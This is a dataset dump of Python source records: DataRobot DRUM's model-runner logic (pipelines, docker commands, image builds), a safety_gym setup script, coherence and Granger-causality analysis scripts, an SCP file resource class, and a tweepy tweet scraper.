json_fields.PIPELINE_SYSTEM_CONFIG_FIELD not in pipeline_json:\n system_config = {\"modelFileSourcePath\": os.path.abspath(__file__)}\n pipeline_json[json_fields.PIPELINE_SYSTEM_CONFIG_FIELD] = system_config\n functional_pipeline_str = json.dumps(pipeline_json)\n return functional_pipeline_str\n\n def _prepare_fit_pipeline(self, run_language):\n\n if self.target_type.value in TargetType.CLASSIFICATION.value and (\n self.options.negative_class_label is None or self.options.class_labels is None\n ):\n # No class label information was supplied, but we may be able to infer the labels\n possible_class_labels = possibly_intuit_order(\n self.options.input,\n self.options.target_csv,\n self.options.target,\n self.target_type == TargetType.ANOMALY,\n )\n if possible_class_labels is not None:\n if self.target_type == TargetType.BINARY:\n if len(possible_class_labels) != 2:\n raise DrumCommonException(\n \"Target type {} requires exactly 2 class labels. Detected {}: {}\".format(\n TargetType.BINARY, len(possible_class_labels), possible_class_labels\n )\n )\n (\n self.options.positive_class_label,\n self.options.negative_class_label,\n ) = possible_class_labels\n elif self.target_type == TargetType.MULTICLASS:\n if len(possible_class_labels) < 2:\n raise DrumCommonException(\n \"Target type {} requires more than 2 class labels. Detected {}: {}\".format(\n TargetType.MULTICLASS,\n len(possible_class_labels),\n possible_class_labels,\n )\n )\n self.options.class_labels = list(possible_class_labels)\n else:\n raise DrumCommonException(\n \"Target type {} requires class label information. 
No labels were supplied and \"\n \"labels could not be inferred from the target.\".format(self.target_type.value)\n )\n\n options = self.options\n # functional pipeline is predictor pipeline\n # they are a little different for batch and server predictions.\n functional_pipeline_name = self._functional_pipelines[(self.run_mode, run_language)]\n functional_pipeline_filepath = CMRunnerUtils.get_pipeline_filepath(functional_pipeline_name)\n # fields to replace in the functional pipeline (predictor)\n replace_data = {\n \"customModelPath\": os.path.abspath(options.code_dir),\n \"input_filename\": options.input,\n \"weights\": options.row_weights,\n \"weights_filename\": options.row_weights_csv,\n \"target_column\": options.target,\n \"target_filename\": options.target_csv,\n \"positiveClassLabel\": options.positive_class_label,\n \"negativeClassLabel\": options.negative_class_label,\n \"classLabels\": options.class_labels,\n \"output_dir\": options.output,\n \"num_rows\": options.num_rows,\n \"sparse_column_file\": options.sparse_column_file,\n \"parameter_file\": options.parameter_file,\n }\n\n functional_pipeline_str = CMRunnerUtils.render_file(\n functional_pipeline_filepath, replace_data\n )\n return functional_pipeline_str\n\n def _run_fit_or_predictions_pipelines_in_mlpiper(self):\n if self.run_mode == RunMode.SERVER:\n run_language = self._check_artifacts_and_get_run_language()\n # in prediction server mode infra pipeline == prediction server runner pipeline\n infra_pipeline_str = self._prepare_prediction_server_or_batch_pipeline(run_language)\n elif self.run_mode == RunMode.SCORE:\n run_language = self._check_artifacts_and_get_run_language()\n tmp_output_filename = None\n # if output is not provided, output into tmp file and print\n if not self.options.output:\n # keep object reference so it will be destroyed only in the end of the process\n __tmp_output_file = tempfile.NamedTemporaryFile(mode=\"w\")\n self.options.output = tmp_output_filename = 
__tmp_output_file.name\n # in batch prediction mode infra pipeline == predictor pipeline\n infra_pipeline_str = self._prepare_prediction_server_or_batch_pipeline(run_language)\n elif self.run_mode == RunMode.FIT:\n run_language = self._get_fit_run_language()\n infra_pipeline_str = self._prepare_fit_pipeline(run_language)\n else:\n error_message = \"{} mode is not supported here\".format(self.run_mode)\n print(error_message)\n raise DrumCommonException(error_message)\n\n config = ExecutorConfig(\n pipeline=infra_pipeline_str,\n pipeline_file=None,\n run_locally=True,\n comp_root_path=CMRunnerUtils.get_components_repo(),\n mlpiper_jar=None,\n spark_jars=None,\n )\n\n _pipeline_executor = Executor(config).standalone(True).set_verbose(self.options.verbose)\n # assign logger with the name drum.mlpiper.Executor to mlpiper Executor\n _pipeline_executor.set_logger(\n logging.getLogger(LOGGER_NAME_PREFIX + \".\" + _pipeline_executor.logger_name())\n )\n\n self.logger.info(\n \">>> Start {} in the {} mode\".format(ArgumentsOptions.MAIN_COMMAND, self.run_mode.value)\n )\n sc = StatsCollector(\n disable_instance=(\n not hasattr(self.options, \"show_perf\")\n or not self.options.show_perf\n or self.run_mode == RunMode.SERVER\n )\n )\n sc.register_report(\"Full time\", \"end\", StatsOperation.SUB, \"start\")\n sc.register_report(\"Init time (incl model loading)\", \"init\", StatsOperation.SUB, \"start\")\n sc.register_report(\"Run time (incl reading CSV)\", \"run\", StatsOperation.SUB, \"init\")\n with verbose_stdout(self.options.verbose):\n sc.enable()\n try:\n sc.mark(\"start\")\n\n _pipeline_executor.init_pipeline()\n self.runtime.initialization_succeeded = True\n sc.mark(\"init\")\n\n _pipeline_executor.run_pipeline(cleanup=False)\n sc.mark(\"run\")\n finally:\n _pipeline_executor.cleanup_pipeline()\n sc.mark(\"end\")\n sc.disable()\n self.logger.info(\n \"<<< Finish {} in the {} mode\".format(\n ArgumentsOptions.MAIN_COMMAND, self.run_mode.value\n )\n )\n 
sc.print_reports()\n if self.run_mode == RunMode.SCORE:\n # print result if output is not provided\n if tmp_output_filename:\n if self.target_type == TargetType.UNSTRUCTURED:\n with open(tmp_output_filename) as f:\n print(f.read())\n else:\n print(pd.read_csv(tmp_output_filename))\n\n def _prepare_docker_command(self, options, run_mode, raw_arguments):\n \"\"\"\n Building a docker command line for running the model inside the docker - this command line\n can be used by the user independently of drum.\n Parameters\n Returns: docker command line to run as a string\n \"\"\"\n options.docker = self._maybe_build_image(options.docker)\n in_docker_model = \"/opt/model\"\n in_docker_input_file = \"/opt/input.csv\"\n in_docker_output_file = \"/opt/output.csv\"\n in_docker_fit_output_dir = \"/opt/fit_output_dir\"\n in_docker_fit_target_filename = \"/opt/fit_target.csv\"\n in_docker_fit_row_weights_filename = \"/opt/fit_row_weights.csv\"\n\n docker_cmd = \"docker run --rm --entrypoint '' --interactive --user $(id -u):$(id -g)\"\n docker_cmd_args = ' -v \"{}\":{}'.format(options.code_dir, in_docker_model)\n\n in_docker_cmd_list = raw_arguments\n in_docker_cmd_list[0] = ArgumentsOptions.MAIN_COMMAND\n in_docker_cmd_list[1] = run_mode.value\n\n # [RAPTOR-5607] Using -cd makes fit fail within docker, but not --code-dir.\n # Hotfix it by replacing -cd with --code-dir\n in_docker_cmd_list = [\n ArgumentsOptions.CODE_DIR if arg == \"-cd\" else arg for arg in in_docker_cmd_list\n ]\n\n CMRunnerUtils.delete_cmd_argument(in_docker_cmd_list, ArgumentsOptions.DOCKER)\n CMRunnerUtils.delete_cmd_argument(in_docker_cmd_list, ArgumentsOptions.SKIP_DEPS_INSTALL)\n if options.memory:\n docker_cmd_args += \" --memory {mem_size} --memory-swap {mem_size} \".format(\n mem_size=options.memory\n )\n CMRunnerUtils.delete_cmd_argument(in_docker_cmd_list, ArgumentsOptions.MEMORY)\n\n if options.class_labels and ArgumentsOptions.CLASS_LABELS not in in_docker_cmd_list:\n 
CMRunnerUtils.delete_cmd_argument(\n in_docker_cmd_list, ArgumentsOptions.CLASS_LABELS_FILE\n )\n in_docker_cmd_list.append(ArgumentsOptions.CLASS_LABELS)\n for label in options.class_labels:\n in_docker_cmd_list.append(label)\n\n CMRunnerUtils.replace_cmd_argument_value(\n in_docker_cmd_list, ArgumentsOptions.CODE_DIR, in_docker_model\n )\n CMRunnerUtils.replace_cmd_argument_value(in_docker_cmd_list, \"-cd\", in_docker_model)\n CMRunnerUtils.replace_cmd_argument_value(\n in_docker_cmd_list, ArgumentsOptions.INPUT, in_docker_input_file\n )\n CMRunnerUtils.replace_cmd_argument_value(\n in_docker_cmd_list, ArgumentsOptions.OUTPUT, in_docker_output_file\n )\n\n if run_mode == RunMode.SERVER:\n host_port_list = options.address.split(\":\", 1)\n if len(host_port_list) == 1:\n raise DrumCommonException(\n \"Error: when using the docker option provide argument --server host:port\"\n )\n port = int(host_port_list[1])\n host_port_inside_docker = \"{}:{}\".format(\"0.0.0.0\", port)\n CMRunnerUtils.replace_cmd_argument_value(\n in_docker_cmd_list, ArgumentsOptions.ADDRESS, host_port_inside_docker\n )\n docker_cmd_args += \" -p {port}:{port}\".format(port=port)\n\n if run_mode in [RunMode.SCORE, RunMode.PERF_TEST, RunMode.VALIDATION, RunMode.FIT]:\n docker_cmd_args += ' -v \"{}\":{}'.format(options.input, in_docker_input_file)\n\n if run_mode == RunMode.SCORE and options.output:\n output_file = os.path.realpath(options.output)\n if not os.path.exists(output_file):\n # Creating an empty file so the mount command will mount the file correctly -\n # otherwise docker create an empty directory\n open(output_file, \"a\").close()\n docker_cmd_args += ' -v \"{}\":{}'.format(output_file, in_docker_output_file)\n CMRunnerUtils.replace_cmd_argument_value(\n in_docker_cmd_list, ArgumentsOptions.OUTPUT, in_docker_output_file\n )\n elif run_mode == RunMode.FIT:\n if options.output:\n fit_output_dir = os.path.realpath(options.output)\n docker_cmd_args += ' -v \"{}\":{}'.format(\n 
fit_output_dir, in_docker_fit_output_dir\n )\n CMRunnerUtils.replace_cmd_argument_value(\n in_docker_cmd_list, ArgumentsOptions.OUTPUT, in_docker_fit_output_dir\n )\n if options.target_csv:\n fit_target_filename = os.path.realpath(options.target_csv)\n docker_cmd_args += ' -v \"{}\":{}'.format(\n fit_target_filename, in_docker_fit_target_filename\n )\n CMRunnerUtils.replace_cmd_argument_value(\n in_docker_cmd_list,\n ArgumentsOptions.TARGET_CSV,\n in_docker_fit_target_filename,\n )\n if options.row_weights_csv:\n fit_row_weights_filename = os.path.realpath(options.row_weights_csv)\n docker_cmd_args += ' -v \"{}\":{}'.format(\n fit_row_weights_filename, in_docker_fit_row_weights_filename\n )\n CMRunnerUtils.replace_cmd_argument_value(\n in_docker_cmd_list,\n ArgumentsOptions.WEIGHTS_CSV,\n in_docker_fit_row_weights_filename,\n )\n\n docker_cmd += \" {} {} {}\".format(\n docker_cmd_args, options.docker, \" \".join(in_docker_cmd_list)\n )\n\n self._print_verbose(\"docker command: [{}]\".format(docker_cmd))\n return docker_cmd\n\n def _run_inside_docker(self, options, run_mode, raw_arguments):\n self._check_artifacts_and_get_run_language()\n docker_cmd = self._prepare_docker_command(options, run_mode, raw_arguments)\n\n self._print_verbose(\"Checking DRUM version in container...\")\n result = subprocess.run(\n [\n \"docker\",\n \"run\",\n \"-it\",\n \"--entrypoint\",\n # provide emtpy entrypoint value to unset the one that could be set within the image\n \"\",\n options.docker,\n \"sh\",\n \"-c\",\n \"drum --version\",\n ],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n container_drum_version = result.stdout.decode(\"utf8\").strip()\n\n host_drum_version = \"{} {}\".format(ArgumentsOptions.MAIN_COMMAND, drum_version)\n if container_drum_version != host_drum_version:\n print(\n \"WARNING: looks like host DRUM version doesn't match container DRUM version. 
This can lead to unexpected behavior.\\n\"\n \"Host DRUM version: {}\\n\"\n \"Container DRUM version: {}\".format(host_drum_version, result.stdout.decode(\"utf8\"))\n )\n err = result.stderr.decode(\"utf8\")\n if len(err):\n print(err)\n time.sleep(0.5)\n else:\n self._print_verbose(\n \"Host DRUM version matches container DRUM version: {}\".format(host_drum_version)\n )\n self._print_verbose(\"-\" * 20)\n p = subprocess.Popen(docker_cmd, shell=True)\n try:\n retcode = p.wait()\n except KeyboardInterrupt:\n retcode = 0\n\n self._print_verbose(\"{bar} retcode: {retcode} {bar}\".format(bar=\"-\" * 10, retcode=retcode))\n return retcode\n\n def _maybe_build_image(self, docker_image_or_directory):\n def _get_requirements_lines(reqs_file_path):\n if not os.path.exists(reqs_file_path):\n return None\n\n with open(reqs_file_path) as f:\n lines = f.readlines()\n lines = [l.strip() for l in lines]\n return lines\n\n ret_docker_image = None\n if os.path.isdir(docker_image_or_directory):\n docker_image_or_directory = os.path.abspath(docker_image_or_directory)\n # Set image tag to the dirname/dirname of the docker context.\n # E.g. for two folders:\n # /home/path1/my_env\n # /home/path2/my_env\n # tags will be 'path1/my_env', 'path2/my_env'\n #\n # If tag already exists, older image will be untagged.\n context_path = os.path.abspath(docker_image_or_directory)\n tag = \"{}/{}\".format(\n os.path.basename(os.path.dirname(context_path)), os.path.basename(context_path)\n ).lower()\n\n lines = _get_requirements_lines(os.path.join(self.options.code_dir, \"requirements.txt\"))\n temp_context_dir = None\n if lines is not None and not self.options.skip_deps_install:\n temp_context_dir = tempfile.mkdtemp()\n shutil.rmtree(temp_context_dir)\n shutil.copytree(docker_image_or_directory, temp_context_dir)\n msg = (\n \"Requirements file has been found in the code dir. 
DRUM will try to install dependencies into a docker image.\\n\"\n \"Docker context has been copied from: {} to: {}\".format(\n docker_image_or_directory, temp_context_dir\n )\n )\n\n print(msg)\n self.logger.debug(msg)\n docker_image_or_directory = temp_context_dir\n\n with open(os.path.join(temp_context_dir, \"Dockerfile\"), mode=\"a\") as f:\n if self.options.language == RunLanguage.PYTHON.value:\n f.write(\"\\nRUN pip3 install {}\".format(\" \".join(lines)))\n elif self.options.language == RunLanguage.R.value:\n quoted_lines = [\"'{}'\".format(ll) for ll in lines]\n deps_str = \", \".join(quoted_lines)\n l1 = \"\\nRUN echo \\\"r <- getOption('repos'); r['CRAN'] <- 'http://cran.rstudio.com/'; options(repos = r);\\\" > ~/.Rprofile\"\n l2 = '\\nRUN Rscript -e \"withCallingHandlers(install.packages(c({}), Ncpus=4), warning = function(w) stop(w))\"'.format(\n deps_str\n )\n f.write(l1)\n f.write(l2)\n else:\n msg = \"Dependencies management is not supported for the '{}' language and will not be installed into an image\".format(\n self.options.language\n )\n self.logger.warning(msg)\n print(msg)\n\n docker_build_msg = \"Building a docker image from directory: {}...\".format(\n docker_image_or_directory\n )\n self.logger.info(docker_build_msg)\n self.logger.info(\"This may take some time\")\n\n try:\n client_docker_low_level = docker.APIClient()\n spinner = Spinner(docker_build_msg + \" \")\n json_lines = []\n # Build docker, rotate spinner according to build progress\n # and save status messages from docker build.\n for line in client_docker_low_level.build(\n path=docker_image_or_directory, rm=True, tag=tag\n ):\n line = line.decode(\"utf-8\").strip()\n json_lines.extend([json.loads(ll) for ll in line.split(\"\\n\")])\n spinner.next()\n spinner.finish()\n # skip a line after spinner\n print()\n\n image_id = None\n build_error = False\n for line in json_lines:\n if \"error\" in line:\n build_error = True\n break\n if \"stream\" in line:\n match = re.search(\n 
r\"(^Successfully built |sha256:)([0-9a-f]+)$\", line[\"stream\"]\n )\n if match:\n image_id = match.group(2)\n if image_id is None or build_error:\n all_lines = \" \\n\".join([json.dumps(l) for l in json_lines])\n raise DrumCommonException(\n \"Failed to build a docker image:\\n{}\".format(all_lines)\n )\n\n print(\"\\nImage successfully built; tag: {}; image id: {}\".format(tag, image_id))\n print(\n \"It is recommended to use --docker {}, if you don't need to rebuild the image.\\n\".format(\n tag\n )\n )\n\n ret_docker_image = image_id\n except docker.errors.APIError as e:\n self.logger.exception(\"Image build failed because of unknown to DRUM reason!\")\n raise\n finally:\n if temp_context_dir is not None:\n shutil.rmtree(temp_context_dir)\n self.logger.info(\"Done building image!\")\n else:\n try:\n client = docker.client.from_env()\n client.images.get(docker_image_or_directory)\n ret_docker_image = docker_image_or_directory\n except docker.errors.ImageNotFound:\n pass\n\n if not ret_docker_image:\n raise DrumCommonException(\n \"The string '{}' does not represent a docker image \"\n \"in your registry or a directory\".format(docker_image_or_directory)\n )\n\n return ret_docker_image\n\n\ndef possibly_intuit_order(\n input_data_file, target_data_file=None, target_col_name=None, is_anomaly=False,\n):\n if is_anomaly:\n return None\n elif target_data_file:\n assert target_col_name is None\n\n y = pd.read_csv(target_data_file, index_col=False)\n y = y.sample(min(1000, len(y)), random_state=1)\n classes = np.unique(y.iloc[:, 0])\n else:\n assert target_data_file is None\n df = pd.read_csv(input_data_file)\n if not target_col_name in df.columns:\n e = \"The column '{}' does not exist in your dataframe. 
\\nThe columns in your dataframe are these: {}\".format(\n target_col_name, list(df.columns)\n )\n print(e, file=sys.stderr)\n raise DrumCommonException(e)\n uniq = df[target_col_name].sample(min(1000, len(df)), random_state=1).unique()\n classes = set(uniq) - {np.nan}\n if len(classes) >= 2:\n return classes\n elif len(classes) == 1:\n raise DrumCommonException(\"Only one target label was provided, please revise training data\")\n return None\n\n\ndef output_in_code_dir(code_dir, output_dir):\n \"\"\"Does the code directory house the output directory?\"\"\"\n code_abs_path = os.path.abspath(code_dir)\n output_abs_path = os.path.abspath(output_dir)\n return os.path.commonpath([code_dir, output_abs_path]) == code_abs_path\n\n\ndef create_custom_inference_model_folder(code_dir, output_dir):\n readme = \"\"\"\n This folder was generated by the DRUM tool. It provides functionality for making \n predictions using the model trained by DRUM\n \"\"\"\n files_in_output = set(glob.glob(output_dir + \"/**\"))\n if output_in_code_dir(code_dir, output_dir):\n # since the output directory is in the code directory use a tempdir to copy into first and\n # cleanup files and prevent errors related to copying the output into itself.\n with tempfile.TemporaryDirectory() as tempdir:\n copy_tree(code_dir, tempdir)\n # remove the temporary version of the target dir\n shutil.rmtree(os.path.join(tempdir, os.path.relpath(output_dir, code_dir)))\n shutil.rmtree(os.path.join(tempdir, \"__pycache__\"), ignore_errors=True)\n copied_files = set(copy_tree(tempdir, output_dir))\n else:\n copied_files = set(copy_tree(code_dir, output_dir))\n shutil.rmtree(os.path.join(output_dir, \"__pycache__\"), ignore_errors=True)\n with open(os.path.join(output_dir, \"README.md\"), \"w\") as fp:\n fp.write(readme)\n if files_in_output & copied_files:\n print(\"Files were overwritten: {}\".format(files_in_output & 
copied_files))\n","sub_path":"custom_model_runner/datarobot_drum/drum/drum.py","file_name":"drum.py","file_ext":"py","file_size_in_byte":50682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"85422395","text":"#!/usr/bin/env python\n\nimport codecs\nimport os\nimport re\nfrom setuptools import find_packages, setup\nimport sys\n\nassert sys.version_info.major == 3 and sys.version_info.minor >= 6, \\\n \"Safety Gym is designed to work with Python 3.6 and greater. \" \\\n + \"Please install it before proceeding.\"\n\n\ndef find_version(*file_paths: str) -> str:\n with codecs.open(os.path.join(*file_paths), \"r\") as fp:\n version_file = fp.read()\n version_match = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\", version_file, re.M)\n if version_match:\n return version_match.group(1)\n raise RuntimeError(\"Unable to find version string.\")\n\n\nsetup(\n name='safety_gym',\n version=find_version(\"safety_gym\", \"__init__.py\"),\n packages=find_packages(include=['safety_gym']),\n install_requires=[\n 'gym>=0.15.3',\n 'hydra-core==1.0.5',\n 'joblib~=0.14.0',\n 'mujoco_py==2.0.2.7',\n 'numpy==1.20.0',\n 'xmltodict~=0.12.0',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"48162400","text":"#!/usr/bin/python\n\nimport matplotlib as mpl\nmpl.use('Agg')\nfrom matplotlib import rc\nrc('font', family='monospace', size=16)\nimport matplotlib.pyplot as plt\n\nimport glob\nfrom scipy.io import loadmat\n\nimport plx_util as putil\nfrom scipy import stats\nimport numpy as np\nimport sys\nimport os\n\nbin = int(sys.argv[1]) \n\n\nfile_titles = \\\n{\n\t'bmi_fa13_left_hemi.mat' : 'BMI data, Fall 2013, Left M1-PMv',\n\t'bmi_fa13_right_hemi.mat' : 'BMI data, Fall 2013, Right M1-PMv',\n\t'mc_fa13_left_hemi.mat' : 'MC data, Fall 2013, Left M1-PMv',\n\t'mc_fa13_right_hemi.mat' 
: 'MC data, Fall 2013, Right M1-PMv',\n\t'mc_sp14_left_hemi_improv.mat' : 'MC data, Spring 2014, Performance Improving, Left M1-PMv',\n\t'mc_su14_left_hemi_stable.mat' : 'MC data, Summer 2014, Performance Stable, Left M1-PMv',\n\t'bmi_su13_left_hemi.mat' : 'BMI data, Summer 2013, Left M1-PMv',\n\t'mc_su13_left_hemi.mat' : 'MC data, Summer 2013, Left M1-PMv'\n}\n\nfiles = glob.glob('./*.mat')\nfiles.sort()\nfor i in range(len(files)):\n\tfiles[i] = files[i][ 2 : ]\n\nall_data = []\nfor file in files:\n\tall_data.append(loadmat(file))\n\nx_vals = []\ny_vals = []\nr2_vals = []\np_vals = []\n\ncolors = ['black', 'red']# ['#ff0000', '#ffcc00', '#33cc33', '#0000ff']\n\nmin_day, max_day = float('inf'), float('-inf')\nmin_val, max_val = float('inf'), float('-inf')\n\nfor data in all_data:\n\tdatasets = [key for key in data if 'plx' in key]\n\tdatasets.sort()\n\tstart_date = datasets[0]\n\tnew_xvals = [putil.days_between(start_date, datasets[i]) for i in range(len(datasets))]\n\tnew_yvals = [data[datasets[i]].flatten()[bin] for i in range(len(datasets))]\n\tmin_day = min(min_day, min(new_xvals))\n\tmax_day = max(max_day, max(new_xvals))\n\tmin_val = min(min_val, min(new_yvals))\n\tmax_val = max(max_val, max(new_yvals))\n\n\tx_vals.append(new_xvals)\n\ty_vals.append(new_yvals)\n\n\tslope, intercept, r_value, p_value, std_err = stats.linregress(new_xvals, new_yvals)\n\tr2_vals.append(r_value ** 2)\n\tp_vals.append(p_value)\n\n# set axis tick padding\nplt.rcParams['xtick.major.pad'] = 8\nplt.rcParams['ytick.major.pad'] = 8\n\nplt.figure(figsize=(18.5, 10))\n\nfor i in range(len(x_vals)):\n\tif p_vals[i] <= 0.05:\n\t\tplt.scatter(x_vals[i], y_vals[i], s=30, color=colors[i])\n\t\tplt.plot(x_vals[i], y_vals[i], label=file_titles[files[i]], linewidth=2, color=colors[i])\n\telse:\n\t\tplt.scatter(x_vals[i], y_vals[i], s=30, color=colors[i])\n\t\tplt.plot(x_vals[i], y_vals[i], label=file_titles[files[i]], linewidth=2, linestyle='--', color=colors[i])\n\t# slope, intercept, r_value, 
p_value, std_err = stats.linregress(np.array(x_vals[i]), np.array(y_vals[i]))\n\t# plt.plot(x_vals[i], intercept + (slope * np.array(x_vals[i])), color=colors[i])\n\ndiff = max_val - min_val\n\nplt.grid()\nplt.xticks(np.arange(min_day, max_day + 1, 3), fontsize=16)\nplt.yticks([round(x, 3) for x in np.arange(min_val - 0.2 * diff, max_val + 0.2 * diff + 0.001, (1. / 10) * diff)], fontsize=16)\nplt.axis([min_day - 1, max_day + 1, min_val - 0.2 * diff, max_val + 0.2 * diff])\n\nplt.suptitle('Average coherence values across 100 Left M1-PMv LFP channels', fontsize=32)\n\nplt.legend(loc='upper left', bbox_to_anchor=(0.01, 0.99), prop={'size' : 24})\nplt.subplots_adjust(left=0.075, right=0.95, top=0.87, bottom=0.1)\n\nplt.xlabel('days from start date', fontsize=24, labelpad=15)\nplt.ylabel('average coherence', fontsize=24, labelpad=10)\n\nplt.savefig(str(bin * 8) + '-' + str((bin + 1) * 8) + '.pdf')\n\n","sub_path":"scripts/plot_coher_days_mult.py","file_name":"plot_coher_days_mult.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"225997264","text":"import sys,os,time,datetime\nimport itertools,warnings\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom glob import glob\nimport networkx as nx\n\nwarnings.filterwarnings(\"ignore\")\n\nimport statsmodels.formula.api as smf\nimport statsmodels.api as sm\nfrom statsmodels.tsa.arima_model import ARIMA,ARMA\nfrom statsmodels.tsa.ar_model import AR,ARResults\nfrom statsmodels.tsa.vector_ar.var_model import VAR\nfrom arch.unitroot import ADF\n\n\"\"\"\n 複数の銘柄間の出来高のGranger因果性を検定.\n 隣接行列を作りネットワーク図示(文字コードに問題).\n\"\"\"\n\n\n\n# In[] ### Data Preparation\ndata = genDeal(dataDir[0], which=\"出来高\")\n\n# Data/ のフォルダ名一覧(銘柄id一覧)を取得\ndataDir = os.listdir(\"Data/\")\ndataDir.sort()\ndataDir.remove(\".DS_Store\")\ndataDir.remove(\"FetchData.py\")\ndataDir.remove(\"__temp\")\n\n# 各銘柄の出来高を読み込みconcat\ndata = 
genDeal(dataDir[0])\nfor id in dataDir[1:]:\n temp = genDeal(id)\n data = pd.merge(data,temp,on=\"日付\")\ndata.head()\n# In[]\ntrain = data[:\"2016-12-31\"]\ntest = data[\"2017-01-01\":]\n\n\n\n# In[] ### 単位根(ADF)検定で銘柄をフィルター.\n# H0: 単位根ARである\n# H1: 定常ARである\nstocks = train.columns\nconstStocks = []\nfor stock in stocks:\n res = ADF(train[stock], trend=\"c\", max_lags=10, method='AIC')\n if res.pvalue < 0.05:\n constStocks.append(stock)\n\n\n\n# In[] ### Granger因果Matrixの作成\ngrangerMat = pd.DataFrame(index=constStocks, columns=constStocks)\npvalMat = pd.DataFrame(index=constStocks, columns=constStocks)\nfor stock_i, stock_j in itertools.product(constStocks,constStocks):\n print(stock_i,stock_j)\n if stock_i != stock_j:\n # VAR(出来高,値幅)のフィッティング\n model_var = VAR(data[[stock_i, stock_j]]).fit(maxlags=15,ic=\"aic\")\n # Granger因果性検定\n t = model_var.test_causality(caused=stock_j, causing=stock_i, kind=\"f\")\n pvalMat.loc[stock_i, stock_j] = t.pvalue\n if t.pvalue < 0.05:\n # Matrix(i,j)に書き込み\n grangerMat.loc[stock_i, stock_j] = 1\n\n# NaNのFill\ngrangerMat = grangerMat.fillna(0)\npvalMat = pvalMat.fillna(1)\n\n# In[] それぞれの銘柄がほか何銘柄から影響を受けているか.\ngrangerMat\ngrangerMat.sum(axis=0)\n\n\n\n# In[] ### ネットワークの図示\ng = grangerMat.values\nnodes = grangerMat.columns.values\n# グラフノード追加\nG = nx.DiGraph()\nG.add_nodes_from(nodes)\nedges = []\n# エッジ追加\nfor stock_i,stock_j in itertools.product(constStocks,constStocks):\n if grangerMat.loc[stock_i, stock_j] == 1:\n G.add_edge(stock_i, stock_j)\npos = nx.spring_layout(G)\n# In[] 描画\nnx.draw_networkx(G, pos, with_labels=True)\nplt.axis(\"off\")\n\n\n# In[] ### トヨタの出来高を予測モデル(VAR)\n# stock = constStocks[4] #トヨタ\n# # トヨタを説明できる銘柄.\n# cause = grangerMat.loc[:,stock][grangerMat.loc[:,stock] == 1].index.values\n# cause = np.append(cause,stock)\n#\n# # In[] VARモデル\n# model_var = VAR(data[cause])\n# model_var.fit(maxlags=15,ic=\"aic\")\n# model_var.predict(data[cause].values)\n# in sample評価 / out of 
sample評価ができない.困った.\n\n\n#\n","sub_path":"MUMSS/grangerCausuallity.py","file_name":"grangerCausuallity.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"516456606","text":"import os\nimport scp\nimport paramiko\nimport threading\n\nfrom transfert.resources._resource import _Resource\n\n\nclass ScpResource(_Resource):\n \"\"\"\n \"\"\"\n\n def __init__(self, url):\n _Resource.__init__(self, url)\n self._fd = None\n self.__client = None\n self._pipe = None\n self._thread = None\n\n @property\n def _client(self):\n if self.__client is None:\n self.__client = self._connect()\n return self.__client\n\n def _connect(self):\n client = paramiko.SSHClient()\n client.load_system_host_keys()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect(self.url.host, self.url.port or 22, self.url.user, self.url.password)\n return scp.SCPClient(client.get_transport())\n\n def open(self, flags):\n os.mkfifo(self._pipe)\n self._thread = threading.Thread(target=self._client.get, daemon=True, args=(self.url.path, self._pipe))\n self._thread.start()\n self._fd = os.open(self._pipe, os.O_RDONLY)\n\n def read(self, size):\n while True:\n chunk = os.read(self._fd, size)\n if not chunk:\n break\n yield chunk\n\n def close(self):\n os.close(self._fd)\n self._fd = None\n os.unlink(self._pipe)\n\n @staticmethod\n def size():\n return float('inf')\n\n def __del__(self):\n if self.__client is not None:\n self.__client.close()\n if self._pipe and os.path.exists(self._pipe):\n os.unlink(self._pipe)\n","sub_path":"transfert/resources/scp.py","file_name":"scp.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"302315551","text":"from tweepy import OAuthHandler\nfrom tweepy import API\nimport tweepy\nimport pandas as pd\n\nconsumer_key = \"\"\nconsumer_secret = \"\"\naccess_token = 
\"\"\naccess_token_secret = \"\"\n\nauth = OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = API(auth,wait_on_rate_limit=True)\nclass scraptweets:\n def user_tweets(search_word,date_since,date_until):\n try:\n tweets = tweepy.Cursor(api.search,q=search_word+\"-filter:retweets\",lang=\"en\",since=date_since,until=date_until).items(100)\n users_locs = []\n analysis = []\n for tweet in tweets:\n users_locs.append([tweet.text])\n tweet_text = pd.DataFrame(data=users_locs,columns=[\"Tweets\"])\n tweet_text.to_csv('/content/drive/My Drive/data preprocessing/'+ search_word +'.csv')\n searchwords = []\n tweet_text['Tweets'] = tweet_text['Tweets'].str.lower()\n for x in range(len(searchwords)):\n analysis.append(tweet_text[tweet_text['Tweets'].str.contains(searchwords[x])])\n tweet_text = pd.DataFrame(data=analysis)\n tweet_text.to_csv('/content/drive/My Drive/data preprocessing/'+ search_word +' analysis'+'.csv')\n except BaseException as e:\n tweet_text = pd.DataFrame(data=e,columns=[\"errors\"])\n tweet_text.to_csv('/content/drive/My Drive/data preprocessing/'+ search_word +'.csv') \nscraptweets.user_tweets('narendra modi','2020-7-10','2020-7-15')","sub_path":"Unstructured Programs For Testing/twitter_code.py","file_name":"twitter_code.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"31679481","text":"#!/usr/bin/env python3\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nimport time\nimport sys\n\nipath = 'state_transitions.pickle'\nwith open(ipath, 'rb') as f:\n state_transitions = pickle.load(f)\nXnext = state_transitions['Xnext']\nCosts = state_transitions['Costs']\n\nqs = state_transitions['qs']\nws = state_transitions['ws']\nus = state_transitions['us']\n\nNq = len(qs)\nNw = len(ws)\nNu = 